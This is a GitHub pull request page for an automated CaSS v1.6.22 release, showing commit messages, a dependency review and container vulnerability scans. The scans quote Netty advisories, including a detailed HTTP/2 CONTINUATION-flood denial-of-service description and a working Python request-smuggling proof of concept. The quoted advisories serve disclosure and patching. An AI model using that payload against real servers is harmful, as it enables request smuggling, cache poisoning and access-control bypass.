Skip to content

Release: v1.6.22#436

Open
github-actions[bot] wants to merge 11 commits into1.6from
release/draft-1.6-1777038349
Open

Release: v1.6.22#436
github-actions[bot] wants to merge 11 commits into1.6from
release/draft-1.6-1777038349

Conversation

@github-actions
Copy link
Copy Markdown

Automated release PR bumping the version and generating dependency updates. Review the changes and merge this PR into the major/minor target branch when you are ready to publish the Docker images.

Lomilar and others added 10 commits April 21, 2026 17:10
Adds an MCP adapter that exposes CaSS OpenAPI capabilities as tools and resources. This allows AI assistants to discover and invoke CaSS API operations directly. The implementation includes automated tool generation from the OpenAPI spec, a streamable HTTP transport endpoint at /api/mcp, and utility libraries for JSON Schema to Zod conversion.
Replaces the custom streamable HTTP implementation with the official SSEServerTransport from the MCP SDK. This change splits the MCP interface into a GET endpoint for SSE connection establishment and a dedicated POST endpoint for message handling. Additionally, the adapter now strictly loads the OpenAPI spec from the live server endpoint and includes a fix for Zod record schema generation.
Improves the utility of the Model Context Protocol (MCP) adapter by generating detailed tool descriptions that include parameter types, locations, and examples. This change also introduces an 'x-mcp-ignore' OpenAPI extension to exclude administrative, internal, and legacy endpoints from being exposed as LLM tools, ensuring the assistant focuses on relevant data operations. Additionally, it enables an insecure admin mode for development environments via the INSECURE_SERVER_IS_ADMIN flag.
…ned descriptions

Enhances the MCP adapter's capability to handle complex API interactions by adding support for multipart/form-data requests and detailed audit logging for tool invocations. This update also refines the auto-generated tool descriptions to provide clearer argument structures for LLMs, introduces basic JSON-LD validation for data persistence, and expands the list of ignored endpoints to further streamline the exposed toolset.
Captures the signature sheet from authentication middleware on each MCP request and propagates it to internal CaSS API calls. This ensures that tool invocations and resource access are performed with the user's identity, replacing the static API key logic with session-based authentication context.
Enables secure Model Context Protocol (MCP) interactions by introducing RFC 8414 Authorization Server Metadata discovery and Bearer token validation. This allows MCP clients to authenticate via OIDC and ensures the server can bridge JWT claims into the internal session context for tool execution.

The update also includes a Keycloak initialization sidecar for automated environment setup and refines the authentication shim to return 401 JSON responses instead of HTML redirects for API-driven clients.
Enables implicit flow in the Keycloak initialization script and removes the 'openid' scope from the shim's filter list to resolve configuration conflicts. Additionally, updates the development workflow in package.json to utilize layered Docker Compose files for OIDC-enabled environments.
Ensures the release workflow explicitly pulls from the gh-pages branch when updating the webapp submodule, rather than relying on the default remote branch.
@github-actions
Copy link
Copy Markdown
Author

github-actions Bot commented Apr 24, 2026

Dependency Review

The following issues were found:

  • ✅ 0 vulnerable package(s)
  • ✅ 0 package(s) with incompatible licenses
  • ✅ 0 package(s) with invalid SPDX license definitions
  • ⚠️ 1 package(s) with unknown licenses.
  • ⚠️ 3 packages with OpenSSF Scorecard issues.

View full job summary

Comment thread src/main/server/shims/auth.js Fixed
Adds `express-rate-limit` middleware to protect against brute-force attempts on sensitive endpoints. This includes separate rate limiters for authentication logic and IP/SSO access guards, which can be toggled using the `CASS_RATE_LIMIT` environment variable.
@sonarqubecloud
Copy link
Copy Markdown

Quality Gate Failed Quality Gate failed

Failed conditions
8.7% Coverage on New Code (required ≥ 80%)

See analysis details on SonarQube Cloud

@github-actions
Copy link
Copy Markdown
Author

github-actions Bot commented Apr 24, 2026

🔍 Vulnerabilities of cass-cass:latest

📦 Image Reference cass-cass:latest
digestsha256:0616cee7eb79f1e3f0296f058e89dea86510ca6a2df10943b6e5245f3bcf5584
vulnerabilitiescritical: 0 high: 0 medium: 0 low: 0
platformlinux/amd64
size268 MB
packages724
📦 Base Image node:24-bookworm-slim
also known as
  • 24-slim
  • 24.15-bookworm-slim
  • 24.15-slim
  • 24.15.0-bookworm-slim
  • 24.15.0-slim
  • krypton-bookworm-slim
  • krypton-slim
  • lts-bookworm-slim
  • lts-slim
digestsha256:eebb3322e27acec1dc74482790f744cf04a4932277c232568b4f07cad242821c
vulnerabilitiescritical: 0 high: 1 medium: 4 low: 25

@github-actions
Copy link
Copy Markdown
Author

github-actions Bot commented Apr 24, 2026

🔍 Vulnerabilities of cass-cass-alpine:latest

📦 Image Reference cass-cass-alpine:latest
digestsha256:e4aa9c56b071b0d77350296585bc6d4c5076c1cd575014714e640d8d1b862e19
vulnerabilitiescritical: 0 high: 0 medium: 0 low: 0
platformlinux/amd64
size227 MB
packages616
📦 Base Image node:24-alpine
also known as
  • 24-alpine3.23
  • 24.15-alpine
  • 24.15-alpine3.23
  • 24.15.0-alpine
  • 24.15.0-alpine3.23
  • krypton-alpine
  • krypton-alpine3.23
  • lts-alpine
  • lts-alpine3.23
digestsha256:8e2c930fda481a6ec141fe5a88e8c249c69f8102fe98af505f38c081649ea749
vulnerabilitiescritical: 0 high: 1 medium: 3 low: 0

@github-actions
Copy link
Copy Markdown
Author

github-actions Bot commented Apr 24, 2026

🔍 Vulnerabilities of cass-cass-distroless:latest

📦 Image Reference cass-cass-distroless:latest
digestsha256:79413548097766d799e398939a8e4a93427ac3a3a9e71fe46773290b04fd3028
vulnerabilitiescritical: 0 high: 2 medium: 0 low: 0
platformlinux/amd64
size99 MB
packages603
📦 Base Image gcr.io/distroless/static-debian12:latest
digestsha256:340ba156c899ddac5ba57c5188b8e7cd56448eb7ee65b280574465eac2718ad2
vulnerabilitiescritical: 0 high: 0 medium: 0 low: 0
critical: 0 high: 2 medium: 0 low: 0 node 24.14.0 (generic)

pkg:generic/node@24.14.0

high : CVE--2026--21710

Affected range>=24.0.0
<24.14.1
Fixed version24.14.1
EPSS Score0.028%
EPSS Percentile8th percentile
Description

high : CVE--2026--21637

Affected range>=24.0.0
<24.14.1
Fixed version24.14.1
EPSS Score0.044%
EPSS Percentile14th percentile
Description

@github-actions
Copy link
Copy Markdown
Author

github-actions Bot commented Apr 24, 2026

🔍 Vulnerabilities of cass-cass-standalone:latest

📦 Image Reference cass-cass-standalone:latest
digestsha256:8985db815fd0230241037de080be100937d964b1039d99fd75a88968f68f6fdb
vulnerabilitiescritical: 0 high: 2 medium: 0 low: 0
platformlinux/amd64
size1.1 GB
packages1301
📦 Base Image ubuntu:24.04
also known as
  • latest
  • noble
digestsha256:98ff7968124952e719a8a69bb3cccdd217f5fe758108ac4f21ad22e1df44d237
vulnerabilitiescritical: 0 high: 0 medium: 11 low: 8
critical: 0 high: 1 medium: 0 low: 0 io.netty/netty-codec-http2 4.1.130.Final (maven)

pkg:maven/io.netty/netty-codec-http2@4.1.130.Final

high 8.7: CVE--2026--33871 Allocation of Resources Without Limits or Throttling

Affected range<4.1.132.Final
Fixed version4.1.132.Final
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score0.025%
EPSS Percentile7th percentile
Description

Summary

A remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of CONTINUATION frames. The server's lack of a limit on the number of CONTINUATION frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive.

Details

The vulnerability exists in Netty's DefaultHttp2FrameReader. When an HTTP/2 HEADERS frame is received without the END_HEADERS flag, the server expects one or more subsequent CONTINUATION frames. However, the implementation does not enforce a limit on the count of these CONTINUATION frames.

The key issue is located in codec-http2/src/main/java/io/netty/handler/codec/http2/DefaultHttp2FrameReader.java. The verifyContinuationFrame() method checks for stream association but fails to implement a frame count limit.

Any user can exploit this by sending a stream of CONTINUATION frames with a zero-byte payload. While Netty has a maxHeaderListSize protection to limit the total size of headers, this check is never triggered by zero-byte frames. The logic effectively evaluates to maxHeaderListSize - 0 < currentSize, which will not trigger the limit until a non-zero byte is added. As a result, the server is forced to process an unlimited number of frames, consuming a CPU thread and monopolizing the connection.

codec-http2/src/main/java/io/netty/handler/codec/http2/DefaultHttp2FrameReader.java

verifyContinuationFrame() (lines 381-393) — No frame count check:

private void verifyContinuationFrame() throws Http2Exception {
    verifyAssociatedWithAStream();
    if (headersContinuation == null) {
        throw connectionError(PROTOCOL_ERROR, "...");
    }
    if (streamId != headersContinuation.getStreamId()) {
        throw connectionError(PROTOCOL_ERROR, "...");
    }
    // NO frame count limit!
}

HeadersBlockBuilder.addFragment() (lines 695-723) — Byte limit bypassed by 0-byte frames:

// Line 710-711: This check NEVER fires when len=0
if (headersDecoder.configuration().maxHeaderListSizeGoAway() - len <
        headerBlock.readableBytes()) {
    headerSizeExceeded();  // 10240 - 0 < 1 => FALSE always
}

When len=0: maxGoAway - 0 < readableBytes10240 < 1 → FALSE. The byte limit is never triggered.

Impact

This is a CPU-based Denial of Service (DoS). Any service using Netty's default HTTP/2 server implementation is impacted. An unauthenticated user can exhaust server CPU resources and block legitimate users, leading to service unavailability. The low bandwidth requirement for the attack makes it highly practical.

critical: 0 high: 1 medium: 0 low: 0 io.netty/netty-codec-http 4.1.130.Final (maven)

pkg:maven/io.netty/netty-codec-http@4.1.130.Final

high 7.5: CVE--2026--33870 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Affected range<4.1.132.Final
Fixed version4.1.132.Final
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS Score0.014%
EPSS Percentile3rd percentile
Description

Summary

Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.

Background

This vulnerability is a new variant discovered during research into the "Funky Chunks" HTTP request smuggling techniques:

The original research tested various chunk extension parsing differentials but did not cover quoted-string handling within extension values.

Technical Details

RFC 9110 Section 7.1.1 defines chunked transfer encoding:

chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF
chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] )
chunk-ext-val = token / quoted-string

RFC 9110 Section 5.6.4 defines quoted-string:

quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE

Critically, the allowed character ranges within a quoted-string are:

qdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text
quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text )

CR (%x0D) and LF (%x0A) bytes fall outside all of these ranges and are therefore not permitted inside chunk extensions—whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a 400 Bad Request response (as Squid does, for example).

Vulnerability

Netty terminates chunk header parsing at \r\n inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.

Expected behavior (RFC-compliant):
A request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.

Actual behavior (Netty):

Chunk: 1;a="value
            ^^^^^ parsing terminates here at \r\n (INCORRECT)
Body: here"... is treated as body or the beginning of a subsequent request

The root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.

Proof of Concept

#!/usr/bin/env python3
import socket

payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b'1;a="\r\n'
    b"X\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b'"\r\n'
    b"Y\r\n"
    b"0\r\n"
    b"\r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)

response = b""
while True:
    try:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk
    except socket.timeout:
        break

sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))

Result: The server returns two HTTP responses from a single TCP connection, confirming request smuggling.

Parsing Breakdown

Parser Request 1 Request 2
Netty (vulnerable) POST / body="X" GET /smuggled (SMUGGLED)
RFC-compliant parser 400 Bad Request (none — malformed request rejected)

Impact

  • Request Smuggling: An attacker can inject arbitrary HTTP requests into a connection.
  • Cache Poisoning: Smuggled responses may poison shared caches.
  • Access Control Bypass: Smuggled requests can circumvent frontend security controls.
  • Session Hijacking: Smuggled requests may intercept responses intended for other users.

Reproduction

  1. Start the minimal proof-of-concept environment using the provided Docker configuration.
  2. Execute the proof-of-concept script included in the attached archive.

Suggested Fix

The parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:

1. Read chunk-size.
2. If ';' is encountered, begin parsing extensions:
   a. For each byte before the terminating CRLF:
      - If CR (%x0D) or LF (%x0A) is encountered outside the
        final terminating CRLF, reject the request with 400 Bad Request.
   b. If the extension value begins with DQUOTE, validate that all
      enclosed bytes conform to the qdtext / quoted-pair grammar.
3. Only treat CRLF as the chunk header terminator when it appears
   outside any quoted-string context and contains no preceding
   illegal bytes.

Acknowledgments

Credit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.

Resources

Attachments

Vulnerability Diagram

java_netty.zip

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants